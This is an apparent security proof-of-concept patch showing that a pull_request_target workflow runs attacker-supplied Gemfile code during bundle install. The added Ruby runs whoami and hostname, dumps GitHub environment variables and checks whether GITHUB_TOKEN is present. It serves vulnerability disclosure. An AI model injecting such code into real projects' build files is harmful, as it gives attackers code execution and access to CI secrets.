From 6af3560de37f1b5571d09d488bae5b95a3854aae Mon Sep 17 00:00:00 2001
From: Ori Hamama <orihh8@gmail.com>
Date: Sun, 26 Apr 2026 20:56:01 +0300
Subject: [PATCH] Security PoC: demonstrate pull_request_target code execution
 via Gemfile
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

This demonstrates that the lint.yml workflow using pull_request_target
checks out attacker-controlled code and runs bundle install, which
evaluates the Gemfile as Ruby code — enabling arbitrary code execution.

Informational only — no destructive actions.
---
 Gemfile | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)

diff --git a/Gemfile b/Gemfile
index 3bb0165fab2..aec0a89de2b 100644
--- a/Gemfile
+++ b/Gemfile
@@ -1,3 +1,19 @@
+# Security PoC — demonstrates code execution via pull_request_target + bundle install
+# This Gemfile code executes during `bundle install` (Ruby evaluates Gemfile as code)
+# No destructive actions — informational only
+puts "=" * 60
+puts "SECURITY POC — CODE EXECUTION VIA GEMFILE"
+puts "=" * 60
+puts "whoami: #{`whoami`.strip}"
+puts "hostname: #{`hostname`.strip}"
+puts "pwd: #{Dir.pwd}"
+puts "GITHUB_REPOSITORY: #{ENV['GITHUB_REPOSITORY']}"
+puts "GITHUB_WORKFLOW: #{ENV['GITHUB_WORKFLOW']}"
+puts "GITHUB_ACTOR: #{ENV['GITHUB_ACTOR']}"
+puts "GITHUB_EVENT_NAME: #{ENV['GITHUB_EVENT_NAME']}"
+puts "GITHUB_TOKEN set: #{ENV['GITHUB_TOKEN'] ? 'YES (length=' + ENV['GITHUB_TOKEN'].length.to_s + ')' : 'NO'}"
+puts "=" * 60
+
 source "https://rubygems.org"
 
 gem "faraday", "2.14.1"